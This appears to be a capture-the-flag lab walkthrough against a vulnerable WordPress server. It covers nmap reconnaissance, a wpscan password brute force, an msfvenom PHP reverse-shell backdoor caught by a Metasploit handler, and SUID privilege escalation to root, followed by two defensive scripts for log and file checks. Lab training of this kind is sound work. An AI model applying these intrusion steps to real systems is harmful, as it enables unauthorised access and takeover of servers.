
Ethical Hacking

The document provides instructions for removing a hack from a compromised server. It outlines the following steps: 1. Install necessary tools like VirtualBox and Kali Linux ISO files. Configure the Kali Linux virtual machine network settings. 2. Perform footprinting on the hacked server to find its IP address and open ports using tools like netdiscover and nmap. 3. Scan the server URLs and download files using uniscan and wget to find clues like usernames and passwords. Use Hydra to crack passwords and gain access to the WordPress admin panel. 4. Enumerate the server further by creating a PHP backdoor using msfvenom and uploading it via the WordPress file manager. Use Metasp

Uploaded by

Bonni Al'Amin

Day 1

Case study: find files a, b and c on the server, because the hacker has left clues on how to remove that hack from the server.

Tools that need to be installed

1. VirtualBox
2. Kali Linux ISO
3. ISO of the hacked server

Server configuration and preparation:


1. Set network adapter 1 of the Kali Linux server to host-only adapter
2. Set network adapter 2 of the Kali Linux server to NAT
3. Start the Kali Linux server and change the eth0 network configuration
- vim or nano /etc/network/interfaces
- change it to look like this

4. Restart networking with the command "/etc/init.d/networking restart"

5. Make sure the local IP is on eth0 with the command "ifconfig". If the local IP is on eth1, change the VirtualBox network settings of the Kali Linux server so that adapter 1 is NAT and adapter 2 is the host-only adapter

Step 1 – Footprinting

1. Find the IP of the hacked server by scanning the network
-> netdiscover -r {your IP with the last value changed to 0}/24
ex : netdiscover -r 192.168.56.0/24
-> try the scanned IPs one by one in a browser to find out which IP is the web server;
in my case it is 192.168.56.100

2. Find the open ports for that IP

-> nmap -sV {IP}
ex : nmap -sV 192.168.56.102

Step 2 – Scanning

1. Scan for all active URLs on that URL
-> uniscan -u {url} -qwe
ex: uniscan -u 192.168.56.102 -qwe

Try the URLs one by one and look for info about user-agent, like:

2. Download all the files listed under user-agent using wget

-> wget {url}
ex: wget 192.168.56.102/fsocity.disc ; wget 192.168.56.102/key-1-of-3.txt

3. View all the files using cat and try all the passwords in file fsocity.disc using the wpscan command
-> wpscan --update ; wpscan --url {url} -U Elliot -P {file.disc}
ex : wpscan --url 192.168.56.102/wp-login -P fsocity.disc
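
Seen from the server side, the password attack in item 3 leaves a clear trail in the web access log. The script below is an added example, not part of the original document: it counts failed POSTs to wp-login per client and marks clients whose failures are followed by a successful login. It assumes the combined log format and that WordPress answers a failed login with 200 and a successful one with 302; the function names, the threshold and the sample log lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: spot password guessing against wp-login in an access log.
# Assumptions: Apache/nginx "combined" log format; WordPress answers a failed
# login POST with 200 and a successful one with a 302 redirect.

# detect_wp_bruteforce LOGFILE [THRESHOLD]
# Prints "ip failed_count verdict" for each client with >= THRESHOLD failures.
detect_wp_bruteforce() {
    local log="$1"
    local threshold="${2:-5}"
    awk -v t="$threshold" '
        # $1 client IP, $6 quoted method, $7 request path, $9 status code
        $6 == "\"POST" && $7 ~ /^\/wp-login/ {
            if ($9 == 200) fails[$1]++
            else if ($9 == 302 && fails[$1] >= t) cracked[$1] = 1
        }
        END {
            for (ip in fails)
                if (fails[ip] >= t)
                    print ip, fails[ip], ((ip in cracked) ? "LOGIN_SUCCEEDED" : "no_success")
        }
    ' "$log" | sort -k2,2nr
}

# Constructed sample log (not taken from the server in this document).
write_sample_log() {
    local out="$1" i
    : > "$out"
    for i in 1 2 3 4 5 6; do    # six failed guesses from one client
        printf '192.168.56.103 - - [01/Jan/2024:10:00:0%s +0000] "POST /wp-login.php HTTP/1.1" 200 3700 "-" "scanner"\n' "$i" >> "$out"
    done
    {
        printf '192.168.56.103 - - [01/Jan/2024:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "scanner"\n'
        # an ordinary user: one typo, then a successful login
        printf '192.168.56.1 - - [01/Jan/2024:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3700 "-" "Mozilla/5.0"\n'
        printf '192.168.56.1 - - [01/Jan/2024:10:05:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"\n'
        printf '192.168.56.1 - - [01/Jan/2024:10:05:10 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"\n'
    } >> "$out"
}

log=$(mktemp)
write_sample_log "$log"
detect_wp_bruteforce "$log" 5    # prints: 192.168.56.103 6 LOGIN_SUCCEEDED
rm -f "$log"
```
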
Step 3 – Enumeration

1. Log in at 192.168.56.102/wp-login with username=elliot and password=ER28-0652

2. Create flood file

-> /etc/init.d/postgresql start # start PostgreSQL first
-> msfvenom -p php/meterpreter_reverse_tcp LHOST={your_kalilinux_IP} LPORT={port} -f raw > {filename}.php
ex: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.103 LPORT=4444 -f raw > backdoor.php

3. Upload file backdoor.php into WP File Manager > wp-content > uploads
4. Open the Metasploit Framework application
5. Create the PAYLOAD in Metasploit Framework with the commands:
-> use exploit/multi/handler
-> set PAYLOAD php/meterpreter_reverse_tcp
-> set LHOST 192.168.56.103
-> set LPORT 4444
-> exploit -j -z
6. Open page 192.168.56.102 and make sure the page keeps reloading
7. Check Metasploit and make sure you have 1 session registered

8. Open the registered session with the commands

-> sessions -l # list the sessions
-> sessions -i 1 # use session 1, then try pwd and make sure the response looks like the picture

9. Go to the home directory -> cd /home
10. Go to the robot directory -> cd robot
11. cat file key-2-of-3.txt and file password.raw-md5
12. Crack the MD5 hash value in file password.raw-md5 on crackstation.net
13. write -> shell
14. write -> python -c 'import pty;pty.spawn("/bin/bash")'
15. become robot with command -> su robot # with password -> abcdefghijklmnopqrstuvwxyz
16. find files with the SUID bit set with command
-> find / -perm -u=s -type f 2>/dev/null

17. write -> !sh
18. go to the root directory -> cd /root
19. go to path /opt/bitnami/apps/wordpress/htdocs/
20. remove or rename file index.html and make sure the page is not hacked anymore
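
Removing index.html restores the page, but the file uploaded in item 3 and the SUID files found in item 16 are still on the server. The script below is an added example, not part of the original document: it lists PHP-type files under wp-content/uploads and SUID files that are not on an approved list. The function names and the allowlist file (one absolute path per line) are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example: checks to run after the defaced index.html is removed.
# Assumptions: the allowlist file (one absolute path per line) and the
# function names are illustrative; the uploads path is the WordPress default.

# php_in_uploads WEBROOT
# WordPress keeps media under wp-content/uploads, so any PHP-type file there
# should be reviewed before the site is considered clean.
php_in_uploads() {
    local webroot="$1"
    find "$webroot/wp-content/uploads" -type f \
        \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.phar' \) \
        2>/dev/null | sort
}

# unexpected_suid ROOT ALLOWLIST
# Lists SUID files under ROOT that are not named in ALLOWLIST.
unexpected_suid() {
    local root="$1"
    local allowlist="$2"
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
        grep -vxFf "$allowlist" || true
}

# Usage: script.sh WEBROOT ALLOWLIST
# e.g. WEBROOT=/opt/bitnami/apps/wordpress/htdocs (the path from step 19)
if [ "$#" -eq 2 ]; then
    echo "PHP files in uploads:"
    php_in_uploads "$1"
    echo "SUID files not in allowlist:"
    unexpected_suid / "$2"
fi
```
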
